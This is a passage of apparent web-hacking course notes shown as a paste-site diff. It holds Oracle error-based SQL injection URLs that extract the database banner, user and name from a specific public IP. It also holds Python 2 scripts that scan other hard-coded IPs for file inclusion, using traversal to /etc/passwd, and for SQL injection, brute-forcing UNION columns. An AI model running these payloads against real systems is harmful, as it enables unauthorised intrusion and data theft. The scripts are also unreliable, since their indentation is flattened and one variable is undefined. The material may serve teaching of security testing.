520		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
521
522
523		Host is running:
524
525
526
527
528
529		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
530
531		User is:
532
533
534
535
536
537		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
538
539		Current database is:
540
541
542
543
544
545
546		############################
547		# Web App Scripting Basics #
548		############################
549
550		1. Simple LFI/RFI
551
552
553		vi lfi-rfi.py
554		--------------------------------
555		#!/usr/bin/env python
556
557		print "\n### PHP LFI/RFI Detector ###"
558
559
560		# urllib2 is a Python module that can be used for fetching URLs. It defines functions and classes to help with URL actions (basic and digest authentication, redirections, cookies, etc) The magic starts with importing the urllib2 module.
561
562		# The module re provides full support for Perl-like regular expressions in Python
563
564	-	-----------------
564	+
565
566
567		import urllib2,re,sys
568
569		TARGET = "http://54.172.112.249/showfile.php?filename=about.txt"
570		RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
571		TravLimit = 12
572
573		print "==> Testing for LFI vulns.."
574		TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
575		for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
576		TARGET += "../"
577		try:
578		source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
579		except urllib2.URLError, e:
580		print "$$$ We had an Error:",e
581		sys.exit(0)
582	-	TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
582	+
583		print "!! ==> LFI Found:",TARGET+"etc/passwd"
584		break ## BREAK LOOP WHEN VULN FOUND
585
586		print "\n==> Testing for RFI vulns.."
587		TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
588		try:
589		source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
590		except urllib2.URLError, e:
591		print "$$$ We had an Error:",e
592		sys.exit(0)
593		if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE
594		print "!! => RFI Found:",TARGET
595
596		print "\nScan Complete\n" ## DONE
597
598		--------------------------------
599
600
601
602
603		2. Simple SQL Injection
604
605
606		vi sqli.py
607		--------------------------------
608		#!/usr/bin/env python
609		print "\n### PHP SQLi Detector ###"
610		import urllib2,re,sys
611
612		TARGET = "http://54.172.112.249/acre2.php?lap=acer"
613
614		SQLi = "%27"
615		SQLiError = "You have an error in your SQL"
616		myNameInHex = "0x6a6f65"
617	-	-----------------------
617	+
618
619		print "==> Testing for SQLi Error Vuln..."
620		URL = TARGET+SQLi
621		try:
622		source = urllib2.urlopen(URL).read() ## WEB REQUEST
623		except urllib2.URLError, e:
624		print "$$$ We had an Error\n",e
625	-	TARGET = "http://45.63.104.73/acre2.php?lap=acer"
625	+
626		if re.search(SQLiError,source): ## SEARCH FOR ERROR IN PAGE
627		print "!! ==> SQLi Found:",TARGET+SQLi
628		print "## ==> Bruting NULL column...",
629		URL = TARGET+SQLi+"%20UNION%20SELECT%20"+myNameInHex ## BUILD OUR SQLi STATEMENT
630		for x in xrange(1,10):
631		if x > 1:
632		URL = URL+","
633		URL = URL+myNameInHex
634		print x,
635		print URL
636		try:
637		source = urllib2.urlopen((URL+"--%20j")).read() ## WEB REQUEST
638		except urllib2.URLError, e:
639		print "$$$ We had an Error\n",e
640		sys.exit(0)
641		if re.search(myName, source): ## SEARCH FOR UNENCODED NULL WORD
642		print "\n!! ==> Null Column Found:",URL+"--"
643		break
644		else:
645		print "** ==> No SQLi Found!"
646		print "\nScan Complete\n"
647		--------------------------------

Public Pastes

Azure Blob Storage/S3
C# | 8 min ago | 1.22 KB
🤑 G2A.com Free Gift Card Guide Apr 2024 FIX 💰
GetText | 25 min ago | 0.38 KB
platformer's main.cpp as of 2024-04-26
C++ | 32 min ago | 15.92 KB
globals.hpp as of 2024-04-26
C++ | 33 min ago | 3.91 KB
Test Insert
C++ | 34 min ago | 4.49 KB
globals.cpp as of 2024-04-26
C++ | 34 min ago | 3.20 KB
tile.hpp as of 2024-04-26
C++ | 35 min ago | 2.85 KB
tile.cpp as of 2024-04-26
C++ | 35 min ago | 2.36 KB